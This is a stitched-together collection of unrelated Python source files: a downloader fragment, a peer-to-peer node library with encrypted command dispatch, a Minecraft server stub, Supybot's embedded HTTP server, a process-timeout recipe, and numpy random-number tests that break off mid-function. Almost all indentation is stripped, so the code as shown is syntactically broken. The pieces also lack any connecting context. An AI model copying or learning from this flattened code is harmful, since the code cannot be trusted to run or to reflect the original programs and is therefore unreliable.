#proceeding only if the address is a valid http address
print("HEADER: " , status)
if(status == 'HTTP/1.1 200 OK' or status == 'HTTP/1.1 206 Partial Content'):
print("Valid Request")
#If resume is called, checking if the file exists and continuing from the part left.
if(args.resume):
print("Checking resume")
if(os.path.isfile(fileaddress)):
print("File exists")
print("Number of bytes: " , os.stat(fileaddress).st_size)
if(int(os.stat(fileaddress).st_size) == int(fields['content-length'])):
print("Files is complete.")
exit(0)
else:
#getting number of threads from the thread info file.
print('Resuming Download')
with open(dest + logFile + "_ThreadInfo" , "rb") as myFile:
numberofthreads = int.from_bytes(myFile.read(), byteorder='little')
myFile.close()
print(numberofthreads)
processRequest(numberofthreads, dest ,logFile, fileaddress, True)
exit(0)
else:
print("File doesn't exist")
#if the file doesn't exist, start a fresh download
for field in fields.keys():
print(field, " : " , fields[field])
print("\n\n")
numberofthreads = args.nthreads
typeofrequest = checkThreadRequest(fields)
#checking if the request can be handled over multiple connections or not.
if(typeofrequest == 1):
open(fileaddress , 'wb')
print('request will be handled over multiple connections')
processRequest(numberofthreads, dest, logFile , fileaddress, False)
elif(typeofrequest == 2):
open(fileaddress , 'wb')
numberofthreads = 1
print('request will be handled over a Single connection')
processRequest(numberofthreads, dest, logFile, fileaddress, False)
else:
print("Invalid Request")
else:
print("Invalid Request")
|
__init__.py
|
from cryptography.fernet import Fernet
import http.server
import requests
from socket import *
import threading
import time
import base64
import json
import typing
import copy
import traceback
from peerbase.peer_utils import *
import random
import hashlib
from concurrent.futures import ThreadPoolExecutor
def process_request(data, node):
data = json.loads(node.decode(data))
command = data['command']
args = data['args']
kwargs = data['kwargs']
try:
resp = get_multikey(command, node.registered_commands)(
node, args, kwargs)
stat = 200
except InternalKeyError:
stat = 404
resp = f'CMD "{command}" NOT FOUND'
except:
stat = 500
resp = traceback.format_exc()
return stat, resp
class LocalServerHandler(http.server.BaseHTTPRequestHandler):
def do_POST(self):
node = self.server.node
content_len = int(self.headers.get('content-length'))
stat, resp = process_request(self.rfile.read(content_len), node)
self.send_response(stat)
self.end_headers()
self.wfile.write(node.encode(json.dumps({
'timestamp': time.time(),
'response': resp
})))
self.wfile.write(b'\n')
def log_message(self, format, *args):
pass
class LoadedThreadingHTTPServer(http.server.ThreadingHTTPServer):
def __init__(self, server_address: typing.Tuple[str, int], RequestHandlerClass: typing.Callable[..., LocalServerHandler], node):
super().__init__(server_address, RequestHandlerClass)
self.node = node
def format_dict(dct, sep='.', start=''):
dct = dct.copy()
to_ret = []
for i in dct.keys():
if type(dct[i]) == dict:
to_ret.extend(format_dict(dct[i], sep=sep, start=f'{start}{i}.'))
else:
to_ret.append(start+i)
return to_ret
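# Example (illustrative): flattening a nested command tree into dotted paths.
#   format_dict({'math': {'add': add_fn, 'sub': sub_fn}, '__echo__': echo_fn})
#   -> ['math.add', 'math.sub', '__echo__']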
class Node:
# Default commands
def _echo(self, node, args, kwargs):
return f'Echoed args {str(args)} and kwargs {str(kwargs)} at time [{time.ctime()}]'
def list_methods(self, node, args, kwargs):
return format_dict(self.registered_commands)
def get_peers(self, node, args, kwargs):
return self.peers
# Threaded Loops
def launch_advertising_loop(self):
while self.running:
data = f'{self.network}.{self.name}|{ip()}:{self.ports["local_server"]}'.encode(
'utf-8')
self.advertising_socket.sendto(
data, ('<broadcast>', self.ports['local_advertiser']))
time.sleep(1)
self.advertising_socket.close()
# Get dict of {peer name: (peer IP, peer port)} for all peers in local network
def discover(self, timeout=1.5):
s = socket(AF_INET, SOCK_DGRAM) # create UDP socket
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind(('', self.ports['local_advertiser']))
ct = time.time()
discovered = {}
while time.time() < ct+timeout:
data, addr = s.recvfrom(1024)
data = data.decode('utf-8')
if data.startswith(self.network+'.'):
try:
identifier, ip_addr = data.split('|')
except ValueError:
continue
try:
node_network, node_name = identifier.split('.')
except ValueError:
continue
try:
node_ip, node_port = ip_addr.split(':')
except ValueError:
continue
if node_name != self.name:
discovered[node_name] = (node_ip, int(node_port))
return discovered
def launch_discovery_loop(self):
while self.running:
self.peers = self.discover()
def process_single_buffer(self, pid, buffer_data):
stat, resp = process_request(buffer_data['data'], self)
try:
resp = requests.post(
url=f'http://{buffer_data["remote"]}/send/',
json={
'target': buffer_data['originator'],
'data': self.encode(json.dumps({
'status': stat,
'result': resp
})).decode('utf-8'),
'packet_id': pid,
'originator': self.name,
'r_type': 'response',
'remote_addr': buffer_data['remote']
}
)
except ConnectionError:
pass
def remote_keepalive_loop(self, target):
while self.running:
try:
resp = requests.post(f'http://{target}/ping/', json={
'node_name': self.name,
'node_network': self.network,
'known_servers': list(self.server_info.keys())
})
dat = resp.json()
for i in dat['peers']:
if not i == self.name:
if not i in self.remote_peers.keys():
self.remote_peers[i] = {target}
else:
self.remote_peers[i].add(target)
for s in dat['servers']:
if not s in self.server_info.keys() and len(self.server_info.keys()) < self.max_remotes:
self.server_info[s] = {
'maintain': False,
'active': True,
'peers': set(),
'thread': threading.Thread(target=self.remote_keepalive_loop, args=[s], name=f'{self.network}.{self.name}.remote_keepalive[{s}]', daemon=True)
}
self.server_info[s]['thread'].start()
for b in dat['buffer'].keys():
if dat['buffer'][b]['type'] == 'response':
self.remote_buffer[b] = dat['buffer'][b]
else:
threading.Thread(target=self.process_single_buffer, args=[
b, dat['buffer'][b]], name=f'{self.network}.{self.name}.process_request[{b}]', daemon=True).start()
except requests.ConnectionError:
self.server_info[target]['active'] = False
if not self.server_info[target]['maintain']:
del self.server_info[target]
for k in list(self.remote_peers.keys()):
if target in self.remote_peers[k]:
self.remote_peers[k].remove(target)
return
if self.server_info[target]['active']:
time.sleep(self.keepalive_tick)
else:
time.sleep(30)
def __init__(
self,
name,
network,
network_key,
ports=[1000, 1001],
servers=None,
registered_commands={},
use_local=True,
keepalive_tick=0.25,
max_remotes=None
):
'''
name: Name of node in network (cannot contain ".", "|", or ":")
network: Name of network (cannot contain ".", "|", or ":")
network_key: str encryption key to use within the network
ports: [local server port, local UDP advertiser port]
servers: address or list of addresses of remote middleman servers
registered_commands: dict (may be nested to have sub/sub-sub/etc commands) of command names related to functions.
Reserved names in top-level tree: __echo__, __list_commands__, __peers__
use_local: boolean, whether to make local connections
keepalive_tick: time between keepalive requests
max_remotes: max number of remotes to connect to at one time. Must be >= len(servers), or None to remove the limit.
'''
if '.' in name or '|' in name or ':' in name:
raise ValueError(
f'Node name {name} contains reserved characters (".","|", or ":").')
if '.' in network or '|' in network or ':' in network:
raise ValueError(
f'Network name {network} contains reserved characters (".","|", or ":").')
if len(ports) != 2:
raise ValueError('The list of ports to use must contain 2 values.')
self.network = network
self.name = name
self.crypt = Fernet(network_key.encode('utf-8'))
self.ports = {
'local_server': ports[0],
'local_advertiser': ports[1]
}
self.features = {}
if servers == None:
self.features['remote'] = False
print(
'WARNING: No server specified. Will not be capable of forming remote connections.')
self.remote_buffer = None
else:
self.features['remote'] = True
if type(servers) == str:
servers = [servers]
if max_remotes != None and max_remotes < len(servers):
raise ValueError(
'max_remotes cannot be less than the number of servers provided.')
self.server_info = {s: {
'maintain': True,
'active': True,
'peers': set(),
'thread': threading.Thread(target=self.remote_keepalive_loop, args=[s], name=f'{self.network}.{self.name}.remote_keepalive[{s}]', daemon=True)
} for s in servers}
self.remote_buffer = {}
self.features['local'] = bool(use_local)
if not self.features['remote'] and not self.features['local']:
raise ValueError(
'Must enable either local or remote connections, or both.')
self.max_remotes = max_remotes
if self.max_remotes == None:
self.max_remotes = 1e99
self.local_server = None
self.running = False
self.advertising_socket = socket(AF_INET, SOCK_DGRAM)
self.advertising_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.advertising_socket.bind(('', 0))
self.advertising_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.advertising_thread = threading.Thread(
target=self.launch_advertising_loop, name=f'{self.network}.{self.name}.advertiser', daemon=True)
self.peers = {}
self.remote_peers = {}
self.keepalive_tick = keepalive_tick
self.discovery_thread = threading.Thread(
target=self.launch_discovery_loop, name=f'{self.network}.{self.name}.discoverer', daemon=True)
self.registered_commands = registered_commands.copy()
self.registered_commands['__echo__'] = self._echo
self.registered_commands['__list_commands__'] = self.list_methods
self.registered_commands['__peers__'] = self.get_peers
def decode(self, data): # Receives encrypted data in base64, returns string of data
if type(data) == bytes:
data = data.decode('utf-8')
decoded_b64 = base64.urlsafe_b64decode(data.encode('utf-8'))
return self.crypt.decrypt(decoded_b64).decode('utf-8')
def encode(self, data): # Receives raw string data, returns base64-encoded encrypted data
encrypted = self.crypt.encrypt(data.encode('utf-8'))
return base64.urlsafe_b64encode(encrypted)
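# Illustration (not from the source): encode() and decode() are inverses, e.g.
#   token = node.encode('hello')   # Fernet-encrypted, then urlsafe-base64-encoded bytes
#   node.decode(token)             # -> 'hello'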
def start(self): # Start the node. This method is blocking.
self.running = True
if self.features['local']:
self.local_server = LoadedThreadingHTTPServer(
(ip(), self.ports['local_server']), LocalServerHandler, self)
self.advertising_thread.start()
self.discovery_thread.start()
if self.features['remote']:
[i['thread'].start() for i in self.server_info.values()]
if self.features['local']:
self.local_server.serve_forever()
# Start the Node in a separate thread
def start_multithreaded(self, thread_name=None, thread_group=None):
proc = threading.Thread(
name=thread_name, target=self.start, group=thread_group, daemon=True)
proc.start()
if self.features['local']:
self.peers = self.discover()
return proc
def _command_one(self, command_path, args, kwargs, target, raise_errors, timeout):
ret = None
i = target
if i in self.peers.keys() and self.features['local']:
'''if raise_errors:
raise LookupError(
f'Could not find target {i} in peers. Available peers: {str(len(self.peers.keys()))}')
else:
continue'''
try:
resp = requests.post(
url=f'http://{self.peers[i][0]}:{self.peers[i][1]}',
data=self.encode(json.dumps({
'timestamp': time.time(),
'command': command_path,
'args': args,
'kwargs': kwargs,
'initiator': f'{self.network}.{self.name}'
})),
timeout=timeout
)
except requests.Timeout:
if raise_errors:
raise TimeoutError(
f'Attempt to reach peer {i} timed out after {str(timeout)} seconds.')
else:
return None
if resp.status_code == 200:
ret = json.loads(self.decode(resp.text))[
'response']
else:
ret = None
print(
f'Encountered error with status {str(resp.status_code)}:\n{json.loads(self.decode(resp.text))["response"]}')
elif i in self.remote_peers.keys() and self.features['remote']:
while len(self.remote_peers[i]) > 0 and ret == None:
remote_target = random.choice(list(self.remote_peers[i]))
pid = hashlib.sha256(
str(time.time() + random.random()).encode('utf-8')).hexdigest()
try:
resp = requests.post(
url=f'http://{remote_target}/send/',
json={
'target': i,
'data': self.encode(json.dumps({
'timestamp': time.time(),
'command': command_path,
'args': args,
'kwargs': kwargs,
'initiator': f'{self.network}.{self.name}'
})).decode('utf-8'),
'packet_id': pid,
'originator': self.name,
'r_type': 'request',
'remote_addr': remote_target
}
)
if resp.status_code != 200:
raise requests.ConnectionError
wait_start = time.time()
if timeout == None:
_t = -1
else:
_t = timeout + 0
while not pid in self.remote_buffer.keys() and (wait_start + _t > time.time() or _t == -1):
pass
if pid in self.remote_buffer.keys():
res = json.loads(self.decode(
copy.deepcopy(self.remote_buffer[pid])['data']))
if res['status'] == 200:
ret = res['result']
else:
print(
f'Encountered error with status {str(res["status"])}:\n{res["result"]}')
del self.remote_buffer[pid]
else:
raise requests.ConnectionError
except (requests.ConnectionError, requests.Timeout):
self.remote_peers[i].remove(remote_target)
if ret == None:
del self.remote_peers[i]
if raise_errors:
raise TimeoutError(
f'Attempt to reach peer {i} remotely failed.')
else:
pass
else:
if raise_errors:
raise LookupError(
f'Could not find target {i} in remote peers. Available peers: {str(len(self.remote_peers.keys()))}')
else:
pass
return ret
def command(self, command_path='__echo__', args=[], kwargs={}, target='*', raise_errors=False, timeout=5, max_threads=32):
if target == '*' or target == []:
targets = list(self.peers.keys())
targets.extend(list(self.remote_peers.keys()))
elif type(target) == list:
targets = target[:]
else:
targets = [target]
with ThreadPoolExecutor(max_workers=max_threads) as executor:
returned = {i:executor.submit(self._command_one,command_path,args,kwargs,i,raise_errors,timeout) for i in targets}
returned = {i:returned[i].result() for i in returned.keys()}
if len(targets) == 1:
return returned[list(returned.keys())[0]]
else:
return returned
# Register <function> at <command_path>
def register_command(self, command_path, function):
try:
translated_path = '"]["'.join([i for i in command_path.split('.')])
exec(f'self.registered_commands["{translated_path}"] = function', globals(), {
'self': self, 'function': function})
except KeyError:
raise KeyError(
f'Unable to register {command_path} as the path to it does not exist.')
# Register dict of <commands>. If <top> != None, will use <top> as the starting point.
def register_commands(self, commands, top=None):
if top == None:
for i in commands.keys():
if type(commands[i]) == dict:
cmd = commands[i].copy()
else:
cmd = copy.copy(commands[i])
self.registered_commands[i] = cmd
else:
for i in commands.keys():
if type(commands[i]) == dict:
cmd = commands[i].copy()
else:
cmd = copy.copy(commands[i])
try:
translated_path = '"]["'.join([i for i in top.split('.')])
exec(f'self.registered_commands["{translated_path}"][i] = cmd', globals(), {
'self': self, 'i': i, 'cmd': cmd})
except KeyError:
raise KeyError(
f'Unable to register commands to {top} as the path to it does not exist.')
# Utility function to list methods of target(s). Similar args as with command()
def get_commands(self, target='*', raise_errors=False, timeout=4):
return self.command(command_path='__list_commands__', target=target, raise_errors=raise_errors, timeout=timeout)
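# Usage sketch (illustrative, not part of the library). Assumptions: the key is
# freshly generated, ports 1000/1001 are free, and 'math.add' is our own command.
if __name__ == '__main__':
    demo_key = Fernet.generate_key().decode('utf-8')
    node = Node('alice', 'demonet', demo_key, ports=[1000, 1001])
    node.register_commands({'math': {'add': lambda n, a, k: a[0] + a[1]}})
    node.start_multithreaded(thread_name='demo-node')
    # A second node built with the same network name and key could then call:
    #     other.command('math.add', args=[1, 2], target='alice')   # -> 3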
|
server.py
|
#!/usr/bin/env python3
import socket
import threading
from .connection import MCConnection
from .crypto import generate_keys
from .world import MCWorld
class MCServer:
PROTOCOL = 107
PROTOCOL_NAME = "1.9"
closed = False
def __init__(self, config):
self.config = config
af = socket.AF_INET6 if config.get("ipv6", False) else socket.AF_INET
self.sock = socket.socket(af, socket.SOCK_STREAM)
self.connections = []
self.players = []
self.entities = []
self.private_key, self.public_key = generate_keys()
self.world = MCWorld(config.get("world", None))
self.thread = threading.Thread(target=self._worker)
def start(self):
self.thread.start()
def join(self, *args, **kwargs):
self.thread.join(*args, **kwargs)
def _worker(self):
host = self.config.get("host", "")
port = self.config.get("port", 25565)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((host, port))
self.sock.listen(self.config.get("max_connections", 32))
print("est. <{}:{}>".format(host, port))
while True:
conn, addr = self.sock.accept()
if len(self.connections) < self.config.get("max_connections", 32):
self.connections.append(MCConnection(self, (conn, addr)))
print("open <{}:{}>: ({} total)".format(addr[0], addr[1], len(self.connections)))
else:
# send unavailable connection error
pass
def response_data(self):
d = {
"version": {
"name": self.PROTOCOL_NAME,
"protocol": self.PROTOCOL
},
"players": {
"max": self.config.get("players", {}).get("max", 10),
"online": len([p for p in self.players if p])
},
"description": {
"text": self.config.get("description", "A Minecraft Server running with ClaspyMC")
}
}
return d
def close(self):
if not self.closed:
for conn in self.connections:
if conn: conn.close()
self.sock.close()
self.closed = True
def __bool__(self):
return not self.closed
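# Usage sketch (illustrative only; the keys mirror the config.get() calls above and
# MCWorld/MCConnection are assumed to come from this package as imported at the top):
if __name__ == "__main__":
    server = MCServer({
        "host": "",                 # bind to all interfaces
        "port": 25565,
        "max_connections": 32,
        "players": {"max": 10},
        "description": "A Minecraft Server running with ClaspyMC"
    })
    server.start()
    try:
        server.join()
    except KeyboardInterrupt:
        server.close()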
|
httpserver.py
|
###
# Copyright (c) 2011, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
An embedded and centralized HTTP server for Supybot's plugins.
"""
import cgi
from threading import Event, Thread
from cStringIO import StringIO
from SocketServer import ThreadingMixIn
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
# For testing purposes
from SocketServer import StreamRequestHandler
import supybot.log as log
import supybot.conf as conf
import supybot.world as world
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization()
configGroup = conf.supybot.servers.http
class RequestNotHandled(Exception):
pass
class RealSupyHTTPServer(HTTPServer):
# TODO: make this configurable
timeout = 0.5
callbacks = {}
running = False
def hook(self, subdir, callback):
if subdir in self.callbacks:
log.warning(('The HTTP subdirectory `%s` was already hooked but '
'has been claimed by another plugin (or maybe you '
'reloaded the plugin and it didn\'t properly unhook. '
'Forced unhook.') % subdir)
self.callbacks[subdir] = callback
def unhook(self, subdir):
callback = self.callbacks.pop(subdir) # May raise a KeyError. We don't care.
callback.doUnhook(self)
return callback
class TestSupyHTTPServer(RealSupyHTTPServer):
def __init__(self, *args, **kwargs):
pass
def serve_forever(self, *args, **kwargs):
pass
def shutdown(self, *args, **kwargs):
pass
if world.testing:
SupyHTTPServer = TestSupyHTTPServer
else:
SupyHTTPServer = RealSupyHTTPServer
class SupyHTTPRequestHandler(BaseHTTPRequestHandler):
def do_X(self, callbackMethod, *args, **kwargs):
if self.path == '/':
callback = SupyIndex()
elif self.path == '/robots.txt':
callback = RobotsTxt()
else:
subdir = self.path.split('/')[1]
try:
callback = self.server.callbacks[subdir]
except KeyError:
callback = Supy404()
# Some shortcuts
for name in ('send_response', 'send_header', 'end_headers', 'rfile',
'wfile', 'headers'):
setattr(callback, name, getattr(self, name))
# We call doX, because this is more supybotic than do_X.
getattr(callback, callbackMethod)(self,
'/' + '/'.join(self.path.split('/')[2:]),
*args, **kwargs)
def do_GET(self):
self.do_X('doGet')
def do_POST(self):
if 'Content-Type' not in self.headers:
self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
self.do_X('doPost', form=form)
def do_HEAD(self):
self.do_X('doHead')
def log_message(self, format, *args):
log.info('HTTP request: %s - %s' %
(self.address_string(), format % args))
class SupyHTTPServerCallback:
"""This is a base class that should be overriden by any plugin that want
to have a Web interface."""
name = "Unnamed plugin"
defaultResponse = _("""
This is a default response of the Supybot HTTP server. If you see this
message, it probably means you are developing a plugin, and you have
neither overriden this message or defined an handler for this query.""")
def doGet(self, handler, path, *args, **kwargs):
handler.send_response(404)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(self.defaultResponse))
self.end_headers()
self.wfile.write(self.defaultResponse)
doPost = doHead = doGet
def doUnhook(self, handler):
"""Method called when unhooking this callback."""
pass
class Supy404(SupyHTTPServerCallback):
"""A 404 Not Found error."""
name = "Error 404"
response = _("""
I am a pretty clever IRC bot, but I suck at serving Web pages, particularly
if I don't know what to serve.
What I'm saying is you just triggered a 404 Not Found, and I am not
trained to help you in such a case.""")
def doGet(self, handler, path, *args, **kwargs):
handler.send_response(404)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(self.response))
self.end_headers()
self.wfile.write(self.response)
doPost = doHead = doGet
class SupyIndex(SupyHTTPServerCallback):
"""Displays the index of available plugins."""
name = "index"
defaultResponse = _("Request not handled.")
template = """
<html>
<head>
<title>""" + _('Supybot Web server index') + """</title>
</head>
<body>
<p>""" + _('Here is a list of the plugins that have a Web interface:') +\
"""
</p>
%s
</body>
</html>"""
def doGet(self, handler, path):
plugins = [x for x in handler.server.callbacks.items()]
if plugins == []:
plugins = _('No plugins available.')
else:
plugins = '<ul><li>%s</li></ul>' % '</li><li>'.join(
['<a href="/%s/">%s</a>' % (x,y.name) for x,y in plugins])
response = self.template % plugins
handler.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response)
class RobotsTxt(SupyHTTPServerCallback):
"""Serves the robot.txt file to robots."""
name = 'robotstxt'
defaultResponse = _('Request not handled')
def doGet(self, handler, path):
response = conf.supybot.servers.http.robots().replace('\\n', '\n')
handler.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response)
httpServer = None
def startServer():
"""Starts the HTTP server. Shouldn't be called from other modules.
The callback should be an instance of a child of SupyHTTPServerCallback."""
global httpServer
log.info('Starting HTTP server.')
address = (configGroup.host(), configGroup.port())
httpServer = SupyHTTPServer(address, SupyHTTPRequestHandler)
Thread(target=httpServer.serve_forever, name='HTTP Server').start()
def stopServer():
"""Stops the HTTP server. Should be run only from this module or from
when the bot is dying (ie. from supybot.world)"""
global httpServer
if httpServer is not None:
log.info('Stopping HTTP server.')
httpServer.shutdown()
httpServer = None
if configGroup.keepAlive():
startServer()
def hook(subdir, callback):
"""Sets a callback for a given subdir."""
if httpServer is None:
startServer()
httpServer.hook(subdir, callback)
def unhook(subdir):
"""Unsets the callback assigned to the given subdir, and return it."""
global httpServer
assert httpServer is not None
callback = httpServer.unhook(subdir)
if len(httpServer.callbacks) <= 0 and not configGroup.keepAlive():
stopServer()
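# Example plugin callback (a sketch, not part of Supybot itself): a plugin
# subclasses SupyHTTPServerCallback, overrides doGet, and registers itself with
# hook(). The subdirectory name 'hello' below is arbitrary.
class ExampleHelloCallback(SupyHTTPServerCallback):
    name = 'Hello example'
    def doGet(self, handler, path, *args, **kwargs):
        response = 'Hello, you requested %s' % path
        handler.send_response(200)
        self.send_header('Content-Type', 'text/plain; charset=utf-8')
        self.send_header('Content-Length', len(response))
        self.end_headers()
        self.wfile.write(response)
# A plugin would then call:   hook('hello', ExampleHelloCallback())
# and on unload:              unhook('hello')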
|
recipe-577028.py
|
import multiprocessing as MP
from sys import exc_info
from time import clock
DEFAULT_TIMEOUT = 60
################################################################################
def timeout(limit=None):
if limit is None:
limit = DEFAULT_TIMEOUT
if limit <= 0:
raise ValueError()
def wrapper(function):
return _Timeout(function, limit)
return wrapper
class TimeoutError(Exception): pass
################################################################################
def _target(queue, function, *args, **kwargs):
try:
queue.put((True, function(*args, **kwargs)))
except:
queue.put((False, exc_info()[1]))
class _Timeout:
def __init__(self, function, limit):
self.__limit = limit
self.__function = function
self.__timeout = clock()
self.__process = MP.Process()
self.__queue = MP.Queue()
def __call__(self, *args, **kwargs):
self.cancel()
self.__queue = MP.Queue(1)
args = (self.__queue, self.__function) + args
self.__process = MP.Process(target=_target, args=args, kwargs=kwargs)
self.__process.daemon = True
self.__process.start()
self.__timeout = self.__limit + clock()
def cancel(self):
if self.__process.is_alive():
self.__process.terminate()
@property
def ready(self):
if self.__queue.full():
return True
elif not self.__queue.empty():
return True
elif self.__timeout < clock():
self.cancel()
else:
return False
@property
def value(self):
if self.ready is True:
flag, load = self.__queue.get()
if flag:
return load
raise load
raise TimeoutError()
def __get_limit(self):
return self.__limit
def __set_limit(self, value):
if value <= 0:
raise ValueError()
self.__limit = value
limit = property(__get_limit, __set_limit)
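# Usage sketch (illustrative; note the recipe relies on time.clock, so it targets
# Python versions that still provide it). Wrap a function, call it to start the
# worker process, then poll .ready and read .value.
if __name__ == '__main__':
    import time
    def add(a, b):
        time.sleep(1)
        return a + b
    slow_add = timeout(limit=5)(add)   # equivalent to decorating add with @timeout(limit=5)
    slow_add(1, 2)                     # starts the background worker process
    while not slow_add.ready:          # poll until the worker has posted its result
        time.sleep(0.1)
    print(slow_add.value)              # -> 3 (raises TimeoutError if not ready)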
|
test_random.py
|
from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
run_module_suite, assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy import random
import sys
import warnings
class TestSeed(object):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
float(1))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(object):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
